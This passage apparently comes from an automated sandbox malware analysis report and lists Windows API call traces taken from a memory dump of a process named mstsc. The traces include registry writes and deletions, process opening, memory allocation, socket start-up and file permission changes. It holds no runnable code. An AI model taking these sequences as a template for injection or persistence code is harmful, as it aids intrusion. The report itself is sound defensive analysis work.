      • Part of subcall function 00063E17: HeapAlloc.KERNEL32(00000000), ref: 00063E42
      • Part of subcall function 00063E17: GetProcessHeap.KERNEL32(00000008,00000039,00020019), ref: 00063ED2
      • Part of subcall function 00063E17: HeapAlloc.KERNEL32(00000000), ref: 00063ED9
      • Part of subcall function 00063E17: GetTickCount.KERNEL32 ref: 00063EED
      • Part of subcall function 00063E17: wsprintfW.USER32 ref: 00063F24
      • Part of subcall function 00063E17: GetProcessHeap.KERNEL32(00000008,00000019), ref: 00063F6E
      • Part of subcall function 00063E17: HeapAlloc.KERNEL32(00000000), ref: 00063F71
      • Part of subcall function 00063E17: GetCaretBlinkTime.USER32 ref: 00063F86
      • Part of subcall function 00063E17: wsprintfW.USER32 ref: 00063FC8
      • Part of subcall function 00063E17: RegQueryValueExW.ADVAPI32(00000000,?,00000000,00000003,00000000,?,00020019), ref: 0006401D
      • Part of subcall function 00063E17: GetProcessHeap.KERNEL32(00000008,?), ref: 0006402C
      • Part of subcall function 00063E17: HeapAlloc.KERNEL32(00000000), ref: 0006402F
      • Part of subcall function 00063E17: RegQueryValueExW.ADVAPI32(?,?,00000000,00000003,00000000,?), ref: 00064051
      • Part of subcall function 00063E17: RegCloseKey.ADVAPI32(?), ref: 00064077
      • Part of subcall function 00063E17: GetProcessHeap.KERNEL32(00000008,?), ref: 00064099
      • Part of subcall function 00063E17: HeapAlloc.KERNEL32(00000000), ref: 0006409C
      • Part of subcall function 00063E17: GetProcessHeap.KERNEL32(00000000,00000000,00000000), ref: 000640AE
      • Part of subcall function 00063E17: HeapReAlloc.KERNEL32(00000000), ref: 000640B1
      • Part of subcall function 00063E17: GetProcessHeap.KERNEL32(00000000,00000000), ref: 000640D5
      • Part of subcall function 00063E17: HeapFree.KERNEL32(00000000), ref: 000640D8
      • Part of subcall function 00063E17: GetProcessHeap.KERNEL32(00000000,00000000,00020019), ref: 000640E4
      • Part of subcall function 00063E17: HeapFree.KERNEL32(00000000), ref: 000640ED
      • Part of subcall function 00063E17: RegCloseKey.ADVAPI32(?), ref: 000640FC
      • Part of subcall function 00063E17: GetProcessHeap.KERNEL32(00000000,?), ref: 00064107
      • Part of subcall function 00063E17: HeapFree.KERNEL32(00000000), ref: 0006410A
      • Part of subcall function 00063E17: GetProcessHeap.KERNEL32(00000000,00000000,00020019), ref: 00064112
      • Part of subcall function 00063E17: HeapFree.KERNEL32(00000000), ref: 00064115
    • SetEvent.KERNEL32 ref: 00063486
      • Part of subcall function 00063199: GetProcessHeap.KERNEL32(00000008,00000029), ref: 00063209
      • Part of subcall function 00063199: HeapAlloc.KERNEL32(00000000), ref: 00063210
      • Part of subcall function 00063199: GetCapture.USER32 ref: 0006321F
      • Part of subcall function 00063199: Sleep.KERNEL32(-0000EA60), ref: 000632C2
      • Part of subcall function 00063199: GetProcessHeap.KERNEL32(00000000,00000000), ref: 000632E9
      • Part of subcall function 00063199: HeapFree.KERNEL32(00000000), ref: 000632F0
    • Sleep.KERNEL32(-0000EA60), ref: 00063534
      • Part of subcall function 0006B9E6: GetProcessHeap.KERNEL32(00000008,0000000B,00000000), ref: 0006BA29
      • Part of subcall function 0006B9E6: HeapAlloc.KERNEL32(00000000), ref: 0006BA2C
      • Part of subcall function 0006B9E6: GetShellWindow.USER32 ref: 0006BA40
      • Part of subcall function 0006B9E6: GetProcessHeap.KERNEL32(00000008,00000011), ref: 0006BA9F
      • Part of subcall function 0006B9E6: HeapAlloc.KERNEL32(00000000), ref: 0006BAA2
      • Part of subcall function 0006B9E6: GetMessageTime.USER32 ref: 0006BAB6
      • Part of subcall function 0006B9E6: GetModuleHandleA.KERNEL32(?,00000000), ref: 0006BAE7
      • Part of subcall function 0006B9E6: GetProcAddress.KERNEL32(00000000), ref: 0006BAEE
      • Part of subcall function 0006B9E6: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006BB23
      • Part of subcall function 0006B9E6: HeapFree.KERNEL32(00000000), ref: 0006BB2C
      • Part of subcall function 0006B9E6: GetProcessHeap.KERNEL32(00000000,?), ref: 0006BB31
      • Part of subcall function 0006B9E6: HeapFree.KERNEL32(00000000), ref: 0006BB34
      • Part of subcall function 00062915: Sleep.KERNEL32(00002710,?,00000000,?,?), ref: 00062938
      • Part of subcall function 00063ADC: GetProcessHeap.KERNEL32(00000008,00000208,00000000), ref: 00063B01
      • Part of subcall function 00063ADC: HeapAlloc.KERNEL32(00000000), ref: 00063B04
      • Part of subcall function 00063ADC: GetProcessHeap.KERNEL32(00000008,00000039,00020006), ref: 00063BC8
      • Part of subcall function 00063ADC: HeapAlloc.KERNEL32(00000000), ref: 00063BCB
      • Part of subcall function 00063ADC: GetTickCount.KERNEL32 ref: 00063BDF
      • Part of subcall function 00063ADC: wsprintfW.USER32 ref: 00063C16
      • Part of subcall function 00063ADC: GetProcessHeap.KERNEL32(00000008,00000019), ref: 00063C56
      • Part of subcall function 00063ADC: HeapAlloc.KERNEL32(00000000), ref: 00063C59
      • Part of subcall function 00063ADC: GetCaretBlinkTime.USER32 ref: 00063C6D
      • Part of subcall function 00063ADC: wsprintfW.USER32 ref: 00063CB2
      • Part of subcall function 00063ADC: RegDeleteValueW.ADVAPI32(?,?), ref: 00063CC5
      • Part of subcall function 00063ADC: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00063CD4
      • Part of subcall function 00063ADC: HeapFree.KERNEL32(00000000), ref: 00063CD7
      • Part of subcall function 00063ADC: GetProcessHeap.KERNEL32(00000008,00000019), ref: 00063D22
      • Part of subcall function 00063ADC: HeapAlloc.KERNEL32(00000000), ref: 00063D25
      • Part of subcall function 00063ADC: GetCaretBlinkTime.USER32 ref: 00063D39
      • Part of subcall function 00063ADC: wsprintfW.USER32 ref: 00063D7E
      • Part of subcall function 00063ADC: RegSetValueExW.ADVAPI32(?,?,00000000,00000003,00000000,?), ref: 00063DAE
      • Part of subcall function 00063ADC: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00063DC6
      • Part of subcall function 00063ADC: HeapFree.KERNEL32(00000000), ref: 00063DC9
      • Part of subcall function 00063ADC: RegCloseKey.ADVAPI32(?), ref: 00063DEA
      • Part of subcall function 00063ADC: GetProcessHeap.KERNEL32(00000000,?), ref: 00063DF5
      • Part of subcall function 00063ADC: HeapFree.KERNEL32(00000000), ref: 00063DF8
      • Part of subcall function 00063ADC: GetProcessHeap.KERNEL32(00000000,00000000,00020006), ref: 00063E04
      • Part of subcall function 00063ADC: HeapFree.KERNEL32(00000000), ref: 00063E07
      • Part of subcall function 00063300: lstrcpyA.KERNEL32(00000000,?), ref: 000633A1
      • Part of subcall function 00063300: lstrcpyA.KERNEL32(-00000020,00072000), ref: 000633AD
      • Part of subcall function 0006482B: GetProcessHeap.KERNEL32(00000000,?,?,00000000,0006318E,?,?,?,?,?,?,?,?,?,?,00062973), ref: 00064845
      • Part of subcall function 0006482B: HeapFree.KERNEL32(00000000,?,?), ref: 0006484C
    • SetEvent.KERNEL32 ref: 0006350D
    Memory Dump Source
    • Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_13_2_60000_mstsc.jbxd
    APIs
      • Part of subcall function 000686AF: GetProcessHeap.KERNEL32(00000008,00000208,00000000,?,00000000,000677F1,00000000,?), ref: 000686D1
      • Part of subcall function 000686AF: HeapAlloc.KERNEL32(00000000), ref: 000686D8
      • Part of subcall function 000686AF: GetModuleFileNameW.KERNEL32(00000104,00000000,00000104), ref: 000686EC
      • Part of subcall function 000686AF: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006870B
      • Part of subcall function 000686AF: HeapFree.KERNEL32(00000000), ref: 0006870E
      • Part of subcall function 000686AF: GetProcessHeap.KERNEL32(00000008,00000000), ref: 0006871A
      • Part of subcall function 000686AF: HeapAlloc.KERNEL32(00000000), ref: 0006871D
      • Part of subcall function 000686AF: GetLastError.KERNEL32 ref: 0006873B
      • Part of subcall function 000686AF: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00068746
      • Part of subcall function 000686AF: HeapFree.KERNEL32(00000000), ref: 0006874D
      • Part of subcall function 00061B2B: lstrcmpA.KERNEL32(?,?), ref: 00061B77
    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00067861
    • SetFilePointer.KERNEL32(00000000,?,00000000,00000000,?,?,?,?,00068D00), ref: 00067876
    • ReadFile.KERNEL32(00000000,?,00000004,?,00000000), ref: 0006788E
    • CloseHandle.KERNEL32(00000000), ref: 000678A7
      • Part of subcall function 0006765B: GetProcessHeap.KERNEL32(00000008,0000001F,00000000,?,00000000), ref: 000676D7
      • Part of subcall function 0006765B: HeapAlloc.KERNEL32(00000000), ref: 000676DA
      • Part of subcall function 0006765B: GetProcessHeap.KERNEL32 ref: 000676EF
      • Part of subcall function 0006765B: GetProcessHeap.KERNEL32(00000008,0000000E), ref: 0006773B
      • Part of subcall function 0006765B: HeapAlloc.KERNEL32(00000000), ref: 0006773E
      • Part of subcall function 0006765B: IsSystemResumeAutomatic.KERNEL32 ref: 00067752
      • Part of subcall function 0006765B: GetModuleHandleA.KERNEL32(00000000,?), ref: 00067783
      • Part of subcall function 0006765B: GetProcAddress.KERNEL32(00000000), ref: 0006778A
      • Part of subcall function 0006765B: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006779E
      • Part of subcall function 0006765B: HeapFree.KERNEL32(00000000), ref: 000677A7
      • Part of subcall function 0006765B: GetProcessHeap.KERNEL32(00000000,?), ref: 000677AC
      • Part of subcall function 0006765B: HeapFree.KERNEL32(00000000), ref: 000677AF
    • GetProcessHeap.KERNEL32(00000000,?,00000000,?,00000001,?,?,?,?,00068D00), ref: 000678C0
    • HeapFree.KERNEL32(00000000), ref: 000678C7
    Memory Dump Source
    • Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_13_2_60000_mstsc.jbxd
    APIs
    • lstrlenW.KERNEL32(?,00000000,00000000,?), ref: 0006E625
    • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?), ref: 0006E634
    • HeapAlloc.KERNEL32(00000000), ref: 0006E63B
    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 0006E654
      • Part of subcall function 0006E545: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,0006E667), ref: 0006E55F
      • Part of subcall function 0006E545: GetProcessHeap.KERNEL32(00000008,?,?,?,00000000,00000000,?,0006E667), ref: 0006E58D
      • Part of subcall function 0006E545: HeapAlloc.KERNEL32(00000000,?,0006E667), ref: 0006E594
      • Part of subcall function 0006E545: GetProcessHeap.KERNEL32(00000000,00000000,?,0006E667), ref: 0006E5E9
      • Part of subcall function 0006E545: HeapFree.KERNEL32(00000000,?,0006E667), ref: 0006E5F0
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006E66D
    • HeapFree.KERNEL32(00000000), ref: 0006E674
    Memory Dump Source
    • Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_13_2_60000_mstsc.jbxd
    APIs
    • ExpandEnvironmentStringsW.KERNEL32(00106D80,00000000,00000000,00106D80,00106D80,00106D80,00106D80,?,0006DA06,00072000,7142434B,00106D80,?,00061ADF,?), ref: 0006D991
    • GetProcessHeap.KERNEL32(00000008,00000000,?,0006DA06,00072000,7142434B,00106D80,?,00061ADF,?,?,?,?,?,?,KCBqiNhR7x), ref: 0006D9AB
    • HeapAlloc.KERNEL32(00000000,?,0006DA06,00072000,7142434B,00106D80,?,00061ADF,?,?,?,?,?,?,KCBqiNhR7x,0006F467), ref: 0006D9B2
    • ExpandEnvironmentStringsW.KERNEL32(00106D80,00000000,7142434B,00000000,?,0006DA06,00072000,7142434B,00106D80,?,00061ADF,?), ref: 0006D9CD
    • GetProcessHeap.KERNEL32(00000000,00000000,0006DA06,00072000,7142434B,00106D80,?,00061ADF,?,?,?,?,?,?,KCBqiNhR7x,0006F467), ref: 0006D9DA
    • HeapFree.KERNEL32(00000000,?,00061ADF), ref: 0006D9E1
    Memory Dump Source
    • Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_13_2_60000_mstsc.jbxd
    APIs
      • Part of subcall function 000674D8: GetProcessHeap.KERNEL32(00000008,00000010,00000000,?,00000000), ref: 0006752D
      • Part of subcall function 000674D8: HeapAlloc.KERNEL32(00000000), ref: 00067530
      • Part of subcall function 000674D8: GetMessageTime.USER32 ref: 00067544
      • Part of subcall function 000674D8: GetProcessHeap.KERNEL32(00000008,0000000E), ref: 0006759E
      • Part of subcall function 000674D8: HeapAlloc.KERNEL32(00000000), ref: 000675A1
      • Part of subcall function 000674D8: IsSystemResumeAutomatic.KERNEL32 ref: 000675B5
      • Part of subcall function 000674D8: GetModuleHandleA.KERNEL32(00000000,?), ref: 000675E6
      • Part of subcall function 000674D8: GetProcAddress.KERNEL32(00000000), ref: 000675ED
      • Part of subcall function 000674D8: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00067601
      • Part of subcall function 000674D8: HeapFree.KERNEL32(00000000), ref: 0006760A
      • Part of subcall function 000674D8: GetProcessHeap.KERNEL32(00000000,?), ref: 0006760F
      • Part of subcall function 000674D8: HeapFree.KERNEL32(00000000), ref: 00067612
      • Part of subcall function 000674D8: OpenProcess.KERNEL32(00000400,00000000,?,00000000), ref: 0006762E
      • Part of subcall function 000674D8: IsWow64Process.KERNELBASE(00000000,00000000), ref: 0006763F
      • Part of subcall function 000674D8: CloseHandle.KERNEL32(00000000), ref: 0006764D
      • Part of subcall function 00067C11: GetProcessHeap.KERNEL32(00000008,0000000B,00000000,?,00000002), ref: 00067C57
      • Part of subcall function 00067C11: HeapAlloc.KERNEL32(00000000,?,00000002), ref: 00067C5A
      • Part of subcall function 00067C11: GetShellWindow.USER32 ref: 00067C6F
      • Part of subcall function 00067C11: GetProcessHeap.KERNEL32(00000008,00000022,?,00000002), ref: 00067CF0
      • Part of subcall function 00067C11: HeapAlloc.KERNEL32(00000000,?,00000002), ref: 00067CF3
      • Part of subcall function 00067C11: GetProcessWindowStation.USER32 ref: 00067D08
      • Part of subcall function 00067C11: GetModuleHandleA.KERNEL32(?,?,00000002), ref: 00067D47
      • Part of subcall function 00067C11: GetProcAddress.KERNEL32(00000000,00000000,?,00000002), ref: 00067D70
      • Part of subcall function 00067C11: GetModuleHandleA.KERNEL32(?,?,00000002), ref: 00067D86
      • Part of subcall function 00067C11: GetProcessHeap.KERNEL32(00000008,00000022,?,00000002), ref: 00067DED
      • Part of subcall function 00067C11: HeapAlloc.KERNEL32(00000000,?,00000002), ref: 00067DF0
      • Part of subcall function 00067C11: GetProcessWindowStation.USER32 ref: 00067E02
      • Part of subcall function 00067C11: GetProcAddress.KERNEL32(00000000,?,00000002), ref: 00067E31
      • Part of subcall function 00067C11: GetProcessHeap.KERNEL32(00000000,00000000,?,00000002), ref: 00067E3F
      • Part of subcall function 00067C11: HeapFree.KERNEL32(00000000,?,00000002), ref: 00067E42
      • Part of subcall function 00067C11: GetProcessHeap.KERNEL32(00000008,00000200,?,00000002), ref: 00067E89
      • Part of subcall function 00067C11: HeapAlloc.KERNEL32(00000000,?,00000002), ref: 00067E8C
      • Part of subcall function 00067C11: GetProcessHeap.KERNEL32(00000008,00000100,?,00000002), ref: 00067EA4
      • Part of subcall function 00067C11: HeapAlloc.KERNEL32(00000000,?,00000002), ref: 00067EA7
      • Part of subcall function 00067C11: GetProcessHeap.KERNEL32(00000000,76E6FE8D,?,00000002), ref: 00068065
      • Part of subcall function 00067C11: HeapFree.KERNEL32(00000000,?,00000002), ref: 0006806C
      • Part of subcall function 00067C11: GetProcessHeap.KERNEL32(00000000,00000000,?,00000002), ref: 0006807F
      • Part of subcall function 00067C11: HeapFree.KERNEL32(00000000,?,00000002), ref: 00068082
      • Part of subcall function 00067C11: GetProcessHeap.KERNEL32(00000000,00000000,?,00000002), ref: 000680B5
      • Part of subcall function 00067C11: HeapFree.KERNEL32(00000000,?,00000002), ref: 000680BE
      • Part of subcall function 00067C11: GetProcessHeap.KERNEL32(00000000,?,?,00000002), ref: 000680C3
      • Part of subcall function 00067C11: HeapFree.KERNEL32(00000000,?,00000002), ref: 000680C6
    • VirtualAlloc.KERNEL32(00000000,76E6FE8D,00003000,00000004,00000000,00000008,76E6FE8D,?,000681EC,00000000,00000008,76E6FE8D), ref: 000684DD
    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,000681EC,00000000), ref: 00068518
    • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?,?,?,?,?,?,?,?,000681EC,00000000), ref: 00068528
    • lstrcmpiA.KERNEL32(?,?), ref: 00068562
    • lstrcmpiA.KERNEL32(?,?), ref: 00068585
    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,000681EC,00000000), ref: 000685D1
    Memory Dump Source
    • Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_13_2_60000_mstsc.jbxd
    APIs
    • OpenProcess.KERNEL32(0000043A,00000000,?), ref: 00064D9C
    • GetCurrentProcess.KERNEL32 ref: 00064DE5
      • Part of subcall function 00064C1F: GetProcessHeap.KERNEL32(00000008,00000010), ref: 00064C65
      • Part of subcall function 00064C1F: HeapAlloc.KERNEL32(00000000), ref: 00064C68
      • Part of subcall function 00064C1F: GetMessageTime.USER32 ref: 00064C7D
      • Part of subcall function 00064C1F: GetProcessHeap.KERNEL32(00000008,0000000E), ref: 00064CD4
      • Part of subcall function 00064C1F: HeapAlloc.KERNEL32(00000000), ref: 00064CD7
      • Part of subcall function 00064C1F: IsSystemResumeAutomatic.KERNEL32 ref: 00064CEB
      • Part of subcall function 00064C1F: GetModuleHandleA.KERNEL32(00000000,?), ref: 00064D1C
      • Part of subcall function 00064C1F: GetProcAddress.KERNEL32(00000000), ref: 00064D23
      • Part of subcall function 00064C1F: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00064D4F
      • Part of subcall function 00064C1F: HeapFree.KERNEL32(00000000), ref: 00064D5C
      • Part of subcall function 00064C1F: GetProcessHeap.KERNEL32(00000000,?), ref: 00064D61
      • Part of subcall function 00064C1F: HeapFree.KERNEL32(00000000), ref: 00064D68
      • Part of subcall function 00069240: GetVersion.KERNEL32(?,00000000,00000000), ref: 00069263
      • Part of subcall function 00069240: CloseHandle.KERNEL32(00000000), ref: 000693F9
    • Sleep.KERNEL32(00000032), ref: 00064E22
    • CloseHandle.KERNEL32(?), ref: 00064E38
    • CloseHandle.KERNEL32(?), ref: 00064E3E
    Memory Dump Source
    • Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_13_2_60000_mstsc.jbxd
    APIs
    • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 0006CFBF
    • ReadFile.KERNEL32(00000000,?,00000200,?,00000000), ref: 0006CFE2
    • ReadFile.KERNEL32(00000000,?,00000200,?,?), ref: 0006D035
    • CloseHandle.KERNEL32(00000000), ref: 0006D043
      • Part of subcall function 0006D9F1: CreateFileW.KERNEL32(00106D80,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0006DA1F
      • Part of subcall function 0006D9F1: GetFileSize.KERNEL32(00000000,00000000,?,00061ADF,?,?,?,?,?,?,KCBqiNhR7x,0006F467), ref: 0006DA2E
      • Part of subcall function 0006D9F1: GetProcessHeap.KERNEL32(00000008,00000002,?,00061ADF,?,?,?,?,?,?,KCBqiNhR7x,0006F467), ref: 0006DA47
      • Part of subcall function 0006D9F1: HeapAlloc.KERNEL32(00000000,?,00061ADF,?,?,?,?,?,?,KCBqiNhR7x,0006F467), ref: 0006DA4E
      • Part of subcall function 0006D9F1: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0006DA63
      • Part of subcall function 0006D9F1: GetLastError.KERNEL32(?,00061ADF,?,?,?,?,?,?,KCBqiNhR7x,0006F467), ref: 0006DA8B
      • Part of subcall function 0006D9F1: CloseHandle.KERNEL32(00000000), ref: 0006DA99
      • Part of subcall function 0006D9F1: GetProcessHeap.KERNEL32(00000000,00000000,?,00061ADF,?,?,?,?,?,?,KCBqiNhR7x,0006F467), ref: 0006DAB0
      • Part of subcall function 0006D9F1: HeapFree.KERNEL32(00000000,?,00061ADF), ref: 0006DAB7
      • Part of subcall function 0006D9F1: GetProcessHeap.KERNEL32(00000000,?,?,00061ADF,?,?,?,?,?,?,KCBqiNhR7x,0006F467), ref: 0006DAC3
      • Part of subcall function 0006D9F1: HeapFree.KERNEL32(00000000,?,00061ADF), ref: 0006DACA
    • Sleep.KERNEL32(000003E8,?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 0006D064
    Memory Dump Source
    • Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_13_2_60000_mstsc.jbxd
    APIs
    • wsprintfW.USER32 ref: 00066C4D
    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00066C6B
    • CloseHandle.KERNEL32(00000000), ref: 00066C7A
    Strings
    Memory Dump Source
    • Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_13_2_60000_mstsc.jbxd
    APIs
    • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,0006E667), ref: 0006E55F
    • GetProcessHeap.KERNEL32(00000008,?,?,?,00000000,00000000,?,0006E667), ref: 0006E58D
    • HeapAlloc.KERNEL32(00000000,?,0006E667), ref: 0006E594
    • GetProcessHeap.KERNEL32(00000000,00000000,?,0006E667), ref: 0006E5E9
    • HeapFree.KERNEL32(00000000,?,0006E667), ref: 0006E5F0
    Memory Dump Source
    • Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_13_2_60000_mstsc.jbxd
    APIs
      • Part of subcall function 0006CF97: CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 0006CFBF
      • Part of subcall function 0006CF97: ReadFile.KERNEL32(00000000,?,00000200,?,00000000), ref: 0006CFE2
      • Part of subcall function 0006CF97: ReadFile.KERNEL32(00000000,?,00000200,?,?), ref: 0006D035
      • Part of subcall function 0006CF97: CloseHandle.KERNEL32(00000000), ref: 0006D043
      • Part of subcall function 0006CF97: Sleep.KERNEL32(000003E8,?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 0006D064
    • Sleep.KERNEL32(000927C0), ref: 0006D3C0
      • Part of subcall function 0006D076: GetProcessHeap.KERNEL32(00000008,00000029), ref: 0006D0F6
      • Part of subcall function 0006D076: HeapAlloc.KERNEL32(00000000), ref: 0006D0FD
      • Part of subcall function 0006D076: GetCapture.USER32 ref: 0006D10F
      • Part of subcall function 0006D076: WSAStartup.WS2_32(00000201,?), ref: 0006D147
      • Part of subcall function 0006D076: GetProcessHeap.KERNEL32(00000008,0000000F), ref: 0006D1F5
      • Part of subcall function 0006D076: HeapAlloc.KERNEL32(00000000), ref: 0006D1FC
      • Part of subcall function 0006D076: GetCurrentThreadId.KERNEL32 ref: 0006D20E
      • Part of subcall function 0006D076: wsprintfA.USER32 ref: 0006D241
      • Part of subcall function 0006D076: Sleep.KERNEL32(-0000EA60,00000000,?,00000000,00000000), ref: 0006D2A1
      • Part of subcall function 0006D076: GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,00000000,00000000), ref: 0006D2CF
      • Part of subcall function 0006D076: HeapFree.KERNEL32(00000000), ref: 0006D2D6
      • Part of subcall function 0006D076: GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,00000000,00000000), ref: 0006D310
      • Part of subcall function 0006D076: HeapFree.KERNEL32(00000000), ref: 0006D317
      • Part of subcall function 0006D076: GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,00000000,00000000), ref: 0006D326
      • Part of subcall function 0006D076: HeapFree.KERNEL32(00000000), ref: 0006D32D
      • Part of subcall function 0006D076: GetProcessHeap.KERNEL32(00000000,?), ref: 0006D33E
      • Part of subcall function 0006D076: HeapFree.KERNEL32(00000000), ref: 0006D345
      • Part of subcall function 0006DD0B: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 0006DD37
      • Part of subcall function 0006DD0B: GetLastError.KERNEL32(?,?,?,?,00061970,?), ref: 0006DD44
      • Part of subcall function 0006DD0B: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0006DD6B
      • Part of subcall function 0006DD0B: SetEndOfFile.KERNEL32(00000000,?,?,?,?,00061970,?), ref: 0006DD76
      • Part of subcall function 0006DD0B: GetLastError.KERNEL32(?,?,?,?,00061970,?), ref: 0006DD80
      • Part of subcall function 0006DD0B: SetFileTime.KERNEL32(00000000,?,?,?,?,?,?,?,00061970,?), ref: 0006DD95
      • Part of subcall function 0006DD0B: CloseHandle.KERNEL32(00000000), ref: 0006DD9C
      • Part of subcall function 0006DD0B: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,00061970,?), ref: 0006DDA9
      • Part of subcall function 0006DD0B: HeapFree.KERNEL32(00000000), ref: 0006DDB0
      • Part of subcall function 0006D8BA: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?), ref: 0006D8EA
      • Part of subcall function 0006D8BA: SetEntriesInAclW.ADVAPI32(00000001,000000FF,00000000,?), ref: 0006D920
      • Part of subcall function 0006D8BA: LocalAlloc.KERNEL32(00000040,00000014), ref: 0006D92A
      • Part of subcall function 0006D8BA: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 0006D934
      • Part of subcall function 0006D8BA: SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,?,00000000), ref: 0006D941
      • Part of subcall function 0006D8BA: SetFileSecurityW.ADVAPI32(?,00000004,00000000), ref: 0006D94B
      • Part of subcall function 0006D8BA: FreeSid.ADVAPI32(00000000), ref: 0006D95A
      • Part of subcall function 0006D8BA: LocalFree.KERNEL32(00000000), ref: 0006D96F
      • Part of subcall function 0006D8BA: LocalFree.KERNEL32(00000000), ref: 0006D976
    • CreateThread.KERNEL32(00000000,00000000,0006D354,00000000,00000000,00000000), ref: 0006D47C
    • CloseHandle.KERNEL32(00000000), ref: 0006D483
      • Part of subcall function 0006482B: GetProcessHeap.KERNEL32(00000000,?,?,00000000,0006318E,?,?,?,?,?,?,?,?,?,?,00062973), ref: 00064845
      • Part of subcall function 0006482B: HeapFree.KERNEL32(00000000,?,?), ref: 0006484C
    • Sleep.KERNEL32(-0000EA60), ref: 0006D4B0
    Memory Dump Source
    • Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_13_2_60000_mstsc.jbxd
    APIs
    • GetCurrentProcess.KERNEL32(00020008,0006E84F), ref: 0006E984
    • OpenProcessToken.ADVAPI32(00000000), ref: 0006E98B
    • GetTokenInformation.ADVAPI32(0006E84F,00000014,00000000,00000004,?), ref: 0006E9A4
    • CloseHandle.KERNEL32(0006E84F), ref: 0006E9AD
    Memory Dump Source
    • Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_13_2_60000_mstsc.jbxd
    APIs
    • PathFindFileNameW.SHLWAPI(76E645DF,00000000,76E6FE8D,?,?,?,?,?,?,KCBqiNhR7x,0006F429), ref: 0006B8D9
      • Part of subcall function 0006E60D: lstrlenW.KERNEL32(?,00000000,00000000,?), ref: 0006E625
      • Part of subcall function 0006E60D: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?), ref: 0006E634
      • Part of subcall function 0006E60D: HeapAlloc.KERNEL32(00000000), ref: 0006E63B
      • Part of subcall function 0006E60D: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 0006E654
      • Part of subcall function 0006E60D: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006E66D
      • Part of subcall function 0006E60D: HeapFree.KERNEL32(00000000), ref: 0006E674
    Strings
    Memory Dump Source
    • Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_13_2_60000_mstsc.jbxd
    APIs
    • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,76E6C570,0006D305,00000000,?,00000000,00000000), ref: 000647F4
    • HeapFree.KERNEL32(00000000), ref: 000647F7
    • GetProcessHeap.KERNEL32(00000008,?,?,00000000,76E6C570,0006D305,00000000,?,00000000,00000000), ref: 00064801
    • HeapAlloc.KERNEL32(00000000), ref: 00064804
    Memory Dump Source
    • Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_13_2_60000_mstsc.jbxd